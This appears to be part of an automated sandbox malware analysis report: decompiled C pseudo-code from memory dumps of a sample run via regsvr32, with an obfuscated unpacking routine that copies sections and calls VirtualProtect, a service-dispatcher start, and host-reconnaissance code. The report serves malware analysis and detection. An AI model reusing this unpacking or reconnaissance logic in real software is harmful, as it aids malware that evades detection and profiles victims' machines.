				if( *(_t417 + 0x4352b0) == 0) {
					_push(_t426);
					_push(_t450);
					if( *(_t417 + 0x4355c5) == 0) {
						_t415 =  *((intOrPtr*)(_t417 + 0x4410a8))(0,  *((intOrPtr*)(_t417 + 0x435914)));
						_v12 = _t523;
						 *(_t417 + 0x4355c5) =  *(_t417 + 0x4355c5) & 0x00000000;
						 *(_t417 + 0x4355c5) =  *(_t417 + 0x4355c5) | _t523 - _v12 | _t415;
						_t523 = _v12;
					}
					_t337 =  *((intOrPtr*)(_t417 + 0x441064))(_t417 + 0x4359f9);
					if( *(_t417 + 0x43523f) == 0) {
						_t413 =  *((intOrPtr*)(_t417 + 0x441060))(_t337);
						 *(_t417 + 0x43523f) =  *(_t417 + 0x43523f) & 0x00000000;
						 *(_t417 + 0x43523f) =  *(_t417 + 0x43523f) | _t479 -  *_t571 | _t413;
						_t479 = _t479;
						_t337 =  *_t571;
						_t571 =  &(_t571[1]);
					}
					 *(_t417 + 0x4352b0) =  *(_t417 + 0x4352b0) & 0x00000000;
					 *(_t417 + 0x4352b0) =  *(_t417 + 0x4352b0) | _t523 ^  *_t571 | _t337;
					_t523 = _t523;
					if( *(_t417 + 0x4351b3) == 0) {
						_t337 =  *((intOrPtr*)(_t417 + 0x4410a8))( *((intOrPtr*)(_t417 + 0x435978)),  *((intOrPtr*)(_t417 + 0x4356a9)));
						_push(_t426);
						 *(_t417 + 0x4351b3) =  *(_t417 + 0x4351b3) & 0x00000000;
						 *(_t417 + 0x4351b3) =  *(_t417 + 0x4351b3) ^ (_t426 & 0x00000000 | _t337);
					}
					_pop( *_t46);
					_t450 = _v12;
					_t426 =  *_t571;
					_t571 =  &(_t571[1]);
					if( *(_t417 + 0x4353c2) == 0) {
						_t337 =  *((intOrPtr*)(_t417 + 0x441068))(_t417 + 0x4352a8, _t450, _t426);
						_v12 = _t479;
						 *(_t417 + 0x4353c2) =  *(_t417 + 0x4353c2) & 0x00000000;
						 *(_t417 + 0x4353c2) =  *(_t417 + 0x4353c2) | _t479 - _v12 | _t337;
						_t479 = _v12;
						_t450 =  *_t571;
						_t575 =  &(_t571[1]);
						_t426 =  *_t575;
						_t571 = _t575 - 0xfffffffc;
					}
				}
				_push(_t450);
				_push(_t426);
				_t339 = _t337 & 0x00000000 ^ (_t523 ^  *_t571 | _a4);
				_t526 = _t523;
				if( *(_t417 + 0x43524c) == 0) {
					_t409 =  *((intOrPtr*)(_t417 + 0x44105c))();
					_v12 = _t450;
					 *(_t417 + 0x43524c) =  *(_t417 + 0x43524c) & 0x00000000;
					 *(_t417 + 0x43524c) =  *(_t417 + 0x43524c) ^ (_t450 & 0x00000000 | _t409);
					_t450 = _v12;
					 *_t67 = _t339;
					_t339 = 0 + _v12;
				}
				if( *(_t417 + 0x43539a) == 0) {
					_t404 =  *((intOrPtr*)(_t417 + 0x441044))(_t417 + 0x435020, _t417 + 0x435a31, _t339);
					 *(_t417 + 0x43517e) =  *(_t417 + 0x43517e) & 0x00000000;
					 *(_t417 + 0x43517e) =  *(_t417 + 0x43517e) ^ (_t479 & 0x00000000 | _t404);
					_t516 = _t479;
					_t405 =  *((intOrPtr*)(_t417 + 0x441060))();
					 *(_t417 + 0x43539a) =  *(_t417 + 0x43539a) & 0x00000000;
					 *(_t417 + 0x43539a) =  *(_t417 + 0x43539a) | _t516 -  *_t571 ^ _t405;
					_t479 = _t516;
					if( *(_t417 + 0x4355b1) == 0) {
						_t408 =  *((intOrPtr*)(_t417 + 0x441068))(_t417 + 0x435068);
						 *(_t417 + 0x4355b1) =  *(_t417 + 0x4355b1) & 0x00000000;
						 *(_t417 + 0x4355b1) =  *(_t417 + 0x4355b1) ^ (_t426 ^  *_t571 | _t408);
						_t426 = _t426;
					}
					_t339 =  *_t571;
					_t571 = _t571 - 0xfffffffc;
				}
				 *_t93 =  *((intOrPtr*)(_t417 + 0x441044))(_t417 + 0x435669, _t417 + 0x4350e8, _t339 +  *((intOrPtr*)(_t339 + 0x3c)));
				_push(_v12);
				_pop( *_t95);
				_t572 = _t571 - 0xfffffffc;
				_push(0 ^  *_t571);
				_t346 = _t417 + 0x43517b;
				if( *(_t417 + 0x43525c) == 0) {
					_t400 =  *((intOrPtr*)(_t417 + 0x4410a8))( *((intOrPtr*)(_t417 + 0x4352d7)),  *((intOrPtr*)(_t417 + 0x43563d)), _t346);
					_v12 = _t450;
					 *(_t417 + 0x43525c) =  *(_t417 + 0x43525c) & 0x00000000;
					 *(_t417 + 0x43525c) =  *(_t417 + 0x43525c) ^ (_t450 - _v12 | _t400);
					_t450 = _v12;
					_t346 = (_t400 & 0x00000000) +  *_t572;
					_t572 = _t572 - 0xfffffffc;
				}
				_push(_t346);
				_t347 = _t417 + 0x435162;
				if( *(_t417 + 0x4357ee) == 0) {
					_t398 =  *((intOrPtr*)(_t417 + 0x441060))();
					_v12 = _t479;
					 *(_t417 + 0x4357ee) =  *(_t417 + 0x4357ee) & 0x00000000;
					 *(_t417 + 0x4357ee) =  *(_t417 + 0x4357ee) ^ _t479 - _v12 ^ _t398;
					_t479 = _v12;
					 *_t118 = _t347;
					_t347 = 0 + _v12;
				}
				_t348 =  *((intOrPtr*)(_t417 + 0x441044))();
				_v12 = _t526;
				 *(_t417 + 0x43516b) =  *(_t417 + 0x43516b) & 0x00000000;
				 *(_t417 + 0x43516b) =  *(_t417 + 0x43516b) | _t526 - _v12 ^ _t348;
				_t529 = _v12;
				 *_t128 = _t347;
				_t350 = 0 + _v12;
				if( *(_t417 + 0x4357de) == 0) {
					_t397 =  *((intOrPtr*)(_t417 + 0x441068))(_t417 + 0x4350d4, _t350);
					 *(_t417 + 0x4357de) =  *(_t417 + 0x4357de) & 0x00000000;
					 *(_t417 + 0x4357de) =  *(_t417 + 0x4357de) | _t450 -  *_t572 ^ _t397;
					_t450 = _t450;
					_pop( *_t137);
					_t350 = _v12;
				}
				_push(_t350);
				_v12 = _t450;
				_t481 = _t479 & 0x00000000 ^ (_t450 ^ _v12 | _t350);
				_t351 =  *(_t481 + 6) & 0x0000ffff;
				if( *(_t417 + 0x435579) == 0) {
					_t394 =  *((intOrPtr*)(_t417 + 0x4410a4))( *((intOrPtr*)(_t417 + 0x4352a4)), _t351);
					 *_t572 = _t529;
					 *(_t417 + 0x435579) = 0 ^ _t394;
					_t529 = 0;
					_t351 = 0 ^  *_t572;
					_t572 =  &(_t572[1]);
				}
				if( *((intOrPtr*)(_t417 + 0x435575)) == 0) {
					if( *(_t417 + 0x43534a) == 0) {
						_t392 =  *((intOrPtr*)(_t417 + 0x441060))(_t351);
						 *(_t417 + 0x43534a) =  *(_t417 + 0x43534a) & 0x00000000;
						 *(_t417 + 0x43534a) =  *(_t417 + 0x43534a) | _t529 -  *_t572 | _t392;
						_t529 = _t529;
						_t351 =  *_t572;
						_t572 = _t572 - 0xfffffffc;
					}
					_push(_t351);
					_push(_t417 + 0x43573a);
					if( *(_t417 + 0x43580e) == 0) {
						_t391 =  *((intOrPtr*)(_t417 + 0x441068))(_t417 + 0x43505c);
						_v12 = _t529;
						 *(_t417 + 0x43580e) =  *(_t417 + 0x43580e) & 0x00000000;
						 *(_t417 + 0x43580e) =  *(_t417 + 0x43580e) | _t529 & 0x00000000 | _t391;
						_t529 = _v12;
					}
					_t384 =  *((intOrPtr*)(_t417 + 0x441054))();
					if( *(_t417 + 0x435555) == 0) {
						_t388 =  *((intOrPtr*)(_t417 + 0x441060))(_t384);
						 *(_t417 + 0x435555) =  *(_t417 + 0x435555) & 0x00000000;
						 *(_t417 + 0x435555) =  *(_t417 + 0x435555) ^ _t426 ^  *_t572 ^ _t388;
						_t426 = _t426;
						_t384 = _t388 & 0x00000000 |  *_t572;
						_t572 = _t572 - 0xfffffffc;
					}
					 *_t171 = _t384;
					_push(_v12);
					_pop( *_t173);
					if( *((intOrPtr*)(_t417 + 0x435716)) == 0) {
						 *_t177 =  *((intOrPtr*)(_t417 + 0x44106c))(_t417 + 0x4358e4);
						_push(_v12);
						_pop( *_t179);
					}
					_pop( *_t180);
					_t351 = 0 + _v12;
				}
				_v12 = _t481;
				_v8 = _v8 & 0x00000000;
				_v8 = _v8 ^ (_t481 ^ _v12 | _t351);
				_t484 = _v12;
				if( *(_t417 + 0x43577a) == 0) {
					_t351 =  *((intOrPtr*)(_t417 + 0x4410a8))(0,  *((intOrPtr*)(_t417 + 0x4351e3)));
					 *_t572 = _t484;
					 *(_t417 + 0x43577a) = _t351;
					_t484 = 0;
				}
				_push(_t484);
				if( *(_t417 + 0x435008) == 0) {
					_t351 =  *((intOrPtr*)(_t417 + 0x441058))();
					 *(_t417 + 0x435008) =  *(_t417 + 0x435008) & 0x00000000;
					 *(_t417 + 0x435008) =  *(_t417 + 0x435008) | _t529 & 0x00000000 ^ _t351;
					_t529 = _t529;
				}
				 *_t572 = _t417;
				_t454 = 0 ^  *(_t484 + 0x54);
				_t420 = 0;
				_v12 = _t351;
				_t486 = _t484 & 0x00000000 ^ (_t351 - _v12 |  *(_t420 + 0x4350b0));
				if( *(_t420 + 0x435156) == 0) {
					_t205 = _t420 + 0x435900; // 0x435900
					_t382 =  *((intOrPtr*)(_t420 + 0x44106c))(_t205, _t454);
					_v12 = _t486;
					 *(_t420 + 0x435156) =  *(_t420 + 0x435156) & 0x00000000;
					 *(_t420 + 0x435156) =  *(_t420 + 0x435156) | _t486 ^ _v12 | _t382;
					_t486 = _v12;
					_t454 =  *_t572;
					_t572 =  &(_t572[1]);
				}
				_t531 = _t529 & 0x00000000 | _t420 & 0x00000000 ^ _a4;
				_t423 = _t420;
				_t428 = _t426 & 0x00000000 ^ (_t562 & 0x00000000 | _t454);
				_t565 = _t562;
				if(_t486 == _t531) {
					L50:
					_pop( *_t258);
					if( *(_t423 + 0x4354c6) == 0) {
						_t371 =  *((intOrPtr*)(_t423 + 0x441058))();
						_v12 = _t531;
						 *(_t423 + 0x4354c6) =  *(_t423 + 0x4354c6) & 0x00000000;
						 *(_t423 + 0x4354c6) =  *(_t423 + 0x4354c6) ^ _t531 ^ _v12 ^ _t371;
						_t531 = _v12;
					}
					_t489 =  &_a244;
					_t568 = _t565;
					do {
						_t431 = _t428;
						_v12 = _t423;
						_t433 = _t431 & 0x00000000 | _t423 & 0x00000000 ^  *(_t489 + 0x10);
						_t423 = _v12;
						_t273 = _t423 + 0x4350ed; // 0x4350ed
						_t274 = _t423 + 0x43585d; // 0x43585d
						_t357 =  *((intOrPtr*)(_t423 + 0x441044))(_t274, _t273, _t433, _t489);
						 *(_t423 + 0x435294) =  *(_t423 + 0x435294) & 0x00000000;
						 *(_t423 + 0x435294) =  *(_t423 + 0x435294) | _t489 & 0x00000000 ^ _t357;
						_t492 = _t489;
						_t531 = (_t531 & 0x00000000 | _t428 & 0x00000000 | _a4) +  *((intOrPtr*)(_t492 + 0x14));
						_t358 = memcpy( *((intOrPtr*)(_t492 + 0xc)) +  *(_t423 + 0x4350b0), _t531, _t433 & 0x00000000 |  *_t572);
						_t572 =  &((_t572 - 0xfffffffc)[3]);
						_t428 = 0;
						if( *(_t423 + 0x435944) == 0) {
							_t284 = _t423 + 0x435a21; // 0x435a21
							_t358 =  *((intOrPtr*)(_t423 + 0x441054))(_t284);
							_v12 = _t531;
							 *(_t423 + 0x435944) = 0 ^ _t358;
							_t531 = _v12;
						}
						_pop( *_t289);
						_t489 =  &_a36;
						_t568 = _t568;
						if( *(_t423 + 0x4356c1) == 0) {
							_t358 =  *((intOrPtr*)(_t423 + 0x4410a4))(1);
							_v12 = _t531;
							 *(_t423 + 0x4356c1) = _t358;
							_t531 = _v12;
						}
						_t296 =  &_v8;
						 *_t296 = _v8 - 1;
					} while ( *_t296 != 0);
					if( *(_t423 + 0x435018) == 0) {
						_t358 =  *((intOrPtr*)(_t423 + 0x4410a8))( *((intOrPtr*)(_t423 + 0x43549a)), 9);
						_push(0);
						 *_t572 = _t489;
						 *(_t423 + 0x435018) = 0 ^ _t358;
					}
					_t500 =  *_t572;
					_t574 = _t572 - 0xfffffffc;
					_v12 = _t454;
					_t457 = _v12;
					_t361 = (_t358 & 0x00000000 ^ _t454 ^ _v12 ^  *(_t500 + 0x28)) +  *(_t423 + 0x4350b0);
					if( *(_t423 + 0x435376) == 0) {
						_t308 = _t423 + 0x435524; // 0x435524
						_t368 =  *((intOrPtr*)(_t423 + 0x44106c))(_t361);
						_v12 = _t531;
						 *(_t423 + 0x435376) =  *(_t423 + 0x435376) & 0x00000000;
						 *(_t423 + 0x435376) =  *(_t423 + 0x435376) | _t531 ^ _v12 | _t368;
						_t531 = _v12;
						 *_t317 = _t308;
						_t361 = _t368 & 0x00000000 ^ _v12;
					}
					_v12 = _t500;
					 *(_t423 + 0x4351a7) =  *(_t423 + 0x4351a7) & 0x00000000;
					 *(_t423 + 0x4351a7) =  *(_t423 + 0x4351a7) | _t500 ^ _v12 ^ _t361;
					_t503 = _v12;
					_t535 = _t531 & 0x00000000 ^ (_t361 & 0x00000000 |  *(_t423 + 0x4350b0));
					_t364 = _t361;
					if((_t531 & 0x00000000 ^ (_t361 & 0x00000000 |  *(_t423 + 0x4350b0))) > 0) {
						if( *(_t423 + 0x43536e) == 0) {
							_t366 =  *((intOrPtr*)(_t423 + 0x441070))(0);
							 *(_t423 + 0x43536e) =  *(_t423 + 0x43536e) & 0x00000000;
							 *(_t423 + 0x43536e) =  *(_t423 + 0x43536e) | _t457 ^  *_t574 | _t366;
							_t457 = _t457;
						}
						_t365 = E00782C41(_t423, _t428, _t457, _t503, _t535, _t535); // executed
						_t364 = E007834DA(_t365, _t423, _t428, _t457, _t503, _t535, _t535);
					}
					_pop( *_t333);
					_pop( *_t335);
					return _t364;
				} else {
					if( *(_t423 + 0x435004) == 0) {
						_t380 =  *((intOrPtr*)(_t423 + 0x4410a8))( *((intOrPtr*)(_t423 + 0x4352fb)),  *((intOrPtr*)(_t423 + 0x4354e6)), _t454, _t428);
						_v12 = _t454;
						 *(_t423 + 0x435004) =  *(_t423 + 0x435004) & 0x00000000;
						 *(_t423 + 0x435004) =  *(_t423 + 0x435004) ^ _t454 & 0x00000000 ^ _t380;
						_pop( *_t225);
						_t454 = _v12;
						_pop( *_t227);
						_t428 = _v12 + (_t428 & 0x00000000);
					}
					do {
						asm("movsb");
						_t428 = _t428 - 1;
					} while (_t428 != 0);
					if( *(_t423 + 0x4359f5) == 0) {
						_t230 = _t423 + 0x4356a1; // 0x4356a1
						_t379 =  *((intOrPtr*)(_t423 + 0x441068))(_t230, _t454);
						_v12 = _t531;
						 *(_t423 + 0x4359f5) =  *(_t423 + 0x4359f5) & 0x00000000;
						 *(_t423 + 0x4359f5) =  *(_t423 + 0x4359f5) ^ _t531 - _v12 ^ _t379;
						_t531 = _v12;
						_t454 = _t454 & 0x00000000 |  *_t572;
						_t572 = _t572 - 0xfffffffc;
					}
					_t486 = _t486 & 0x00000000 ^ (_t428 -  *_t572 |  *(_t423 + 0x4350b0));
					_t428 = _t428;
					 *((intOrPtr*)(_t423 + 0x4354d2)) = 0x40;
					_t241 = _t423 + 0x4356e5; // 0x4356e5
					_t242 = _t423 + 0x4352b4; // 0x4352b4
					_t374 =  *((intOrPtr*)(_t423 + 0x441044))(_t242, _t241, _t454);
					 *(_t423 + 0x4351cb) =  *(_t423 + 0x4351cb) & 0x00000000;
					 *(_t423 + 0x4351cb) =  *(_t423 + 0x4351cb) | _t531 ^  *_t572 ^ _t374;
					_t531 = _t531;
					_t454 =  *_t572;
					_t572 = _t572 - 0xfffffffc;
					_t248 = _t423 + 0x4354d2; // 0x4354d2
					_push(2);
					_push(_t454);
					if( *(_t423 + 0x435010) == 0) {
						_t377 =  *((intOrPtr*)(_t423 + 0x441058))();
						_v12 = _t531;
						 *(_t423 + 0x435010) =  *(_t423 + 0x435010) & 0x00000000;
						 *(_t423 + 0x435010) =  *(_t423 + 0x435010) ^ _t531 & 0x00000000 ^ _t377;
						_t531 = _v12;
					}
					VirtualProtect(_t486, ??, ??, ??);
					goto L50;
				}
			}



































































                            0x0078242a
                            0x0078242a
                            0x0078242a
                            0x0078242a
                            0x0078242a
                            0x00782437
                            0x00782439
                            0x0078243a
                            0x00782441
                            0x00782442
                            0x00782448
                            0x00782450
                            0x00782457
                            0x00782466
                            0x00782469
                            0x00782472
                            0x00782475
                            0x00782475
                            0x0078247f
                            0x00782485
                            0x00782486
                            0x0078248e
                            0x00782498
                            0x0078249e
                            0x007824a6
                            0x007824ad
                            0x007824b3
                            0x007824b3
                            0x007824bd
                            0x007824ca
                            0x007824cd
                            0x007824d9
                            0x007824e0
                            0x007824e6
                            0x007824e9
                            0x007824ec
                            0x007824ec
                            0x007824f5
                            0x007824fc
                            0x00782502
                            0x0078250a
                            0x00782518
                            0x0078251e
                            0x00782524
                            0x0078252b
                            0x00782531
                            0x00782532
                            0x00782535
                            0x0078253a
                            0x0078253d
                            0x00782547
                            0x00782552
                            0x00782558
                            0x00782560
                            0x00782567
                            0x0078256d
                            0x00782572
                            0x00782575
                            0x0078257a
                            0x0078257d
                            0x0078257d
                            0x00782547
                            0x00782580
                            0x00782581
                            0x0078258c
                            0x0078258e
                            0x00782596
                            0x00782599
                            0x0078259f
                            0x007825a7
                            0x007825ae
                            0x007825b4
                            0x007825b9
                            0x007825bc
                            0x007825bc
                            0x007825c6
                            0x007825d7
                            0x007825e3
                            0x007825ea
                            0x007825f0
                            0x007825f1
                            0x007825fd
                            0x00782604
                            0x0078260a
                            0x00782612
                            0x0078261b
                            0x00782627
                            0x0078262e
                            0x00782634
                            0x00782634
                            0x00782637
                            0x0078263a
                            0x0078263a
                            0x00782656
                            0x00782659
                            0x0078265c
                            0x00782667
                            0x0078266a
                            0x0078266b
                            0x00782678
                            0x00782687
                            0x0078268d
                            0x00782695
                            0x0078269c
                            0x007826a2
                            0x007826ab
                            0x007826ae
                            0x007826ae
                            0x007826b1
                            0x007826b2
                            0x007826bf
                            0x007826c2
                            0x007826c8
                            0x007826d0
                            0x007826d7
                            0x007826dd
                            0x007826e2
                            0x007826e5
                            0x007826e5
                            0x007826e9
                            0x007826ef
                            0x007826f7
                            0x007826fe
                            0x00782704
                            0x00782709
                            0x0078270c
                            0x00782716
                            0x00782720
                            0x0078272c
                            0x00782733
                            0x00782739
                            0x0078273a
                            0x0078273d
                            0x0078273d
                            0x00782740
                            0x00782741
                            0x0078274c
                            0x00782751
                            0x0078275c
                            0x00782765
                            0x0078276d
                            0x00782774
                            0x0078277a
                            0x0078277d
                            0x00782780
                            0x00782780
                            0x0078278a
                            0x00782797
                            0x0078279a
                            0x007827a6
                            0x007827ad
                            0x007827b3
                            0x007827ba
                            0x007827bd
                            0x007827bd
                            0x007827c0
                            0x007827c7
                            0x007827cf
                            0x007827d8
                            0x007827de
                            0x007827e6
                            0x007827ed
                            0x007827f3
                            0x007827f3
                            0x007827f6
                            0x00782803
                            0x00782806
                            0x00782812
                            0x00782819
                            0x0078281f
                            0x00782826
                            0x00782829
                            0x00782829
                            0x0078282d
                            0x00782830
                            0x00782833
                            0x00782840
                            0x00782850
                            0x00782853
                            0x00782856
                            0x00782856
                            0x0078285e
                            0x00782861
                            0x00782861
                            0x00782864
                            0x0078286c
                            0x00782870
                            0x00782873
                            0x0078287d
                            0x00782887
                            0x0078288f
                            0x00782896
                            0x0078289c
                            0x0078289c
                            0x0078289d
                            0x007828a5
                            0x007828a7
                            0x007828b3
                            0x007828ba
                            0x007828c0
                            0x007828c0
                            0x007828c3
                            0x007828cb
                            0x007828cd
                            0x007828ce
                            0x007828dd
                            0x007828e9
                            0x007828ec
                            0x007828f3
                            0x007828f9
                            0x00782901
                            0x00782908
                            0x0078290e
                            0x00782913
                            0x00782916
                            0x00782916
                            0x00782923
                            0x00782925
                            0x0078292f
                            0x00782931
                            0x00782934
                            0x00782a43
                            0x00782a49
                            0x00782a56
                            0x00782a58
                            0x00782a5e
                            0x00782a66
                            0x00782a6d
                            0x00782a73
                            0x00782a73
                            0x00782a7f
                            0x00782a81
                            0x00782a82
                            0x00782a8f
                            0x00782a90
                            0x00782a9c
                            0x00782a9e
                            0x00782aa2
                            0x00782aa9
                            0x00782ab0
                            0x00782abc
                            0x00782ac3
                            0x00782ac9
                            0x00782ad6
                            0x00782ae2
                            0x00782ae2
                            0x00782ae2
                            0x00782aeb
                            0x00782aed
                            0x00782af4
                            0x00782afa
                            0x00782b01
                            0x00782b07
                            0x00782b07
                            0x00782b10
                            0x00782b1f
                            0x00782b21
                            0x00782b29
                            0x00782b2d
                            0x00782b33
                            0x00782b3a
                            0x00782b40
                            0x00782b40
                            0x00782b43
                            0x00782b43
                            0x00782b43
                            0x00782b53
                            0x00782b5d
                            0x00782b63
                            0x00782b65
                            0x00782b6c
                            0x00782b72
                            0x00782b75
                            0x00782b78
                            0x00782b7b
                            0x00782b89
                            0x00782b8c
                            0x00782b99
                            0x00782b9c
                            0x00782ba3
                            0x00782ba9
                            0x00782bb1
                            0x00782bb8
                            0x00782bbe
                            0x00782bc7
                            0x00782bca
                            0x00782bca
                            0x00782bcd
                            0x00782bd5
                            0x00782bdc
                            0x00782be2
                            0x00782bf2
                            0x00782bf4
                            0x00782bf8
                            0x00782c01
                            0x00782c05
                            0x00782c11
                            0x00782c18
                            0x00782c1e
                            0x00782c1e
                            0x00782c20
                            0x00782c26
                            0x00782c26
                            0x00782c2b
                            0x00782c37
                            0x00782c3e
                            0x0078293a
                            0x00782941
                            0x00782951
                            0x00782957
                            0x0078295f
                            0x00782966
                            0x0078296f
                            0x00782972
                            0x0078297b
                            0x0078297e
                            0x0078297e
                            0x00782981
                            0x00782981
                            0x00782982
                            0x00782982
                            0x0078298c
                            0x0078298f
                            0x00782996
                            0x0078299c
                            0x007829a4
                            0x007829ab
                            0x007829b1
                            0x007829ba
                            0x007829bd
                            0x007829bd
                            0x007829cd
                            0x007829cf
                            0x007829d0
                            0x007829db
                            0x007829e2
                            0x007829e9
                            0x007829f5
                            0x007829fc
                            0x00782a02
                            0x00782a05
                            0x00782a08
                            0x00782a0b
                            0x00782a12
                            0x00782a14
                            0x00782a1c
                            0x00782a1e
                            0x00782a24
                            0x00782a2c
                            0x00782a33
                            0x00782a39
                            0x00782a39
                            0x00782a3d
                            0x00000000
                            0x00782a3d

                            APIs
                            • VirtualProtect.KERNEL32(00000000,00000000,00000002,004354D2), ref: 00782A3D
                            Memory Dump Source
                            • Source File: 0000000D.00000002.622781002.0000000000780000.00000040.00000001.sdmp, Offset: 00780000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_13_2_780000_regsvr32.jbxd
                            Similarity
                            • API ID: ProtectVirtual
                            • String ID:
                            • API String ID: 544645111-0
                            • Opcode ID: 965ff0d501365a58e1c6b305a2901c127183e1ebb994f7cd1b7f885fc6bc8627
                            • Instruction ID: b4f2dd6b54ee2e02cdaad76a5dbb31bc9049a5d2bea027b21f301c19d0520c56
                            • Opcode Fuzzy Hash: 965ff0d501365a58e1c6b305a2901c127183e1ebb994f7cd1b7f885fc6bc8627
                            • Instruction Fuzzy Hash: 6A426E72810604EFFF04DFA4C98979A7BB5FF54325F0851AADC0DAE04AD77815A4CBA8
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 100030B7, Relevance: 1.5, APIs: 1, Instructions: 34COMMON
                            Download Yara Rule
                            C-Code - Quality: 100%
                            			E100030B7() {
				int _t3;
				struct _SERVICE_TABLE_ENTRY* _t6;
				int* _t11;
				intOrPtr _t12;

				_t3 = E10008604(0x10);
				 *0x1001e71c = _t3;
				if(_t3 == 0) {
					L4:
					return _t3 | 0xffffffff;
				} else {
					_t3 = E10008604(0xa);
					_t11 =  *0x1001e71c; // 0x19536e0
					 *_t11 = _t3;
					if(_t3 == 0) {
						goto L4;
					} else {
						_t12 =  *0x1001e688; // 0x1930590
						E1000902D(1, _t3, 7, 8, _t12 + 0x648);
						_t6 =  *0x1001e71c; // 0x19536e0
						 *((intOrPtr*)(_t6 + 4)) = E10003052;
						_t3 = StartServiceCtrlDispatcherA(_t6);
						if(_t3 == 0) {
							goto L4;
						} else {
							return 0;
						}
					}
				}
			}







                            0x100030b9
                            0x100030be
                            0x100030c6
                            0x10003119
                            0x1000311c
                            0x100030c8
                            0x100030ca
                            0x100030d0
                            0x100030d6
                            0x100030da
                            0x00000000
                            0x100030dc
                            0x100030dc
                            0x100030f2
                            0x100030f7
                            0x100030ff
                            0x1000310c
                            0x10003114
                            0x00000000
                            0x10003116
                            0x10003118
                            0x10003118
                            0x10003114
                            0x100030da

                            APIs
                              • Part of subcall function 10008604: HeapAlloc.KERNEL32(00000008,?,?,10008F84,00000100,?,10005FCB), ref: 10008612
                            • StartServiceCtrlDispatcherA.ADVAPI32(019536E0), ref: 1000310C
                            Memory Dump Source
                            • Source File: 0000000D.00000002.624165771.0000000010001000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true
                            • Associated: 0000000D.00000002.624156732.0000000010000000.00000002.00020000.sdmp Download File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_13_2_10000000_regsvr32.jbxd
                            Yara matches
                            Similarity
                            • API ID: AllocCtrlDispatcherHeapServiceStart
                            • String ID:
                            • API String ID: 3270895466-0
                            • Opcode ID: 8e36714de1a88bfbba535e0dee9b6efdb0d5928a7c2cdeb04c08aa71bf5ba524
                            • Instruction ID: ac16b269da70e1785f3d8de3b20eaf3184fc588054e4d94b314cf4149a8ccc23
                            • Opcode Fuzzy Hash: 8e36714de1a88bfbba535e0dee9b6efdb0d5928a7c2cdeb04c08aa71bf5ba524
                            • Instruction Fuzzy Hash: 59F03AB42443428BF748CB74DC92B5A3398EB44394F55C128E615CB2D5EE75D8128A14
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 1000D01F, Relevance: 33.5, APIs: 14, Strings: 5, Instructions: 282COMMON
                            Download Yara Rule

                            Control-flow Graph

                            C-Code - Quality: 91%
                            			E1000D01F(void* __fp0) {
				long _v8;
				long _v12;
				union _SID_NAME_USE _v16;
				struct _SYSTEM_INFO _v52;
				char _v180;
				short _v692;
				char _v704;
				char _v2680;
				void* __esi;
				struct _OSVERSIONINFOA* _t81;
				intOrPtr _t83;
				void* _t84;
				long _t86;
				void** _t88;
				intOrPtr _t90;
				intOrPtr _t91;
				intOrPtr _t92;
				intOrPtr _t97;
				void* _t98;
				intOrPtr _t103;
				char* _t105;
				void* _t108;
				intOrPtr _t111;
				long _t115;
				signed int _t117;
				long _t119;
				intOrPtr _t124;
				intOrPtr _t127;
				intOrPtr _t130;
				intOrPtr _t134;
				intOrPtr _t145;
				intOrPtr _t147;
				intOrPtr _t149;
				intOrPtr _t152;
				intOrPtr _t154;
				signed int _t159;
				struct HINSTANCE__* _t162;
				short* _t164;
				intOrPtr _t167;
				WCHAR* _t168;
				char* _t169;
				intOrPtr _t181;
				intOrPtr _t200;
				void* _t215;
				long _t218;
				void* _t219;
				char* _t220;
				struct _OSVERSIONINFOA* _t222;
				void* _t223;
				int* _t224;
				void* _t241;

				_t241 = __fp0;
				_t162 =  *0x1001e69c; // 0x10000000
				_t81 = E10008604(0x1ac4);
				_t222 = _t81;
				if(_t222 == 0) {
					return _t81;
				}
				 *((intOrPtr*)(_t222 + 0x1640)) = GetCurrentProcessId();
				_t83 =  *0x1001e684; // 0x19afaa0
				_t84 =  *((intOrPtr*)(_t83 + 0xa0))(_t215);
				_t3 = _t222 + 0x648; // 0x648
				E10012301( *((intOrPtr*)(_t222 + 0x1640)) + _t84, _t3);
				_t5 = _t222 + 0x1644; // 0x1644
				_t216 = _t5;
				_t86 = GetModuleFileNameW(0, _t5, 0x105);
				_t227 = _t86;
				if(_t86 != 0) {
					 *((intOrPtr*)(_t222 + 0x1854)) = E10008FBE(_t216, _t227);
				}
				GetCurrentProcess();
				_t88 = E1000BA05(); // executed
				 *(_t222 + 0x110) = _t88;
				_t178 =  *_t88;
				if(E1000BB8D( *_t88) == 0) {
					_t90 = E1000BA62(_t178, _t222);
					__eflags = _t90;
					_t181 = (0 | _t90 > 0x00000000) + 1;
					__eflags = _t181;
					 *((intOrPtr*)(_t222 + 0x214)) = _t181;
				} else {
					 *((intOrPtr*)(_t222 + 0x214)) = 3;
				}
				_t12 = _t222 + 0x220; // 0x220, executed
				_t91 = E1000E3F1(_t12); // executed
				 *((intOrPtr*)(_t222 + 0x218)) = _t91;
				_t92 = E1000E3B6(_t12); // executed
				 *((intOrPtr*)(_t222 + 0x21c)) = _t92;
				 *(_t222 + 0x224) = _t162;
				_v12 = 0x80;
				_v8 = 0x100;
				_t22 = _t222 + 0x114; // 0x114
				if(LookupAccountSidW(0,  *( *(_t222 + 0x110)), _t22,  &_v12,  &_v692,  &_v8,  &_v16) == 0) {
					GetLastError();
				}
				_t97 =  *0x1001e694; // 0x19afbf8
				_t98 =  *((intOrPtr*)(_t97 + 0x3c))(0x1000);
				_t26 = _t222 + 0x228; // 0x228
				 *(_t222 + 0x1850) = 0 | _t98 > 0x00000000;
				GetModuleFileNameW( *(_t222 + 0x224), _t26, 0x105);
				GetLastError();
				_t31 = _t222 + 0x228; // 0x228
				 *((intOrPtr*)(_t222 + 0x434)) = E10008FBE(_t31, _t98);
				_t34 = _t222 + 0x114; // 0x114, executed
				_t103 = E1000B7A8(_t34,  &_v692);
				_t35 = _t222 + 0xb0; // 0xb0
				 *((intOrPtr*)(_t222 + 0xac)) = _t103;
				_push(_t35);
				E1000B67D(_t103, _t35, _t98, _t241);
				_t37 = _t222 + 0xb0; // 0xb0
				_t105 = _t37;
				_t38 = _t222 + 0xd0; // 0xd0
				_t164 = _t38;
				if(_t105 != 0) {
					_t159 = MultiByteToWideChar(0, 0, _t105, 0xffffffff, _t164, 0x20);
					if(_t159 > 0) {
						_t164[_t159] = 0;
					}
				}
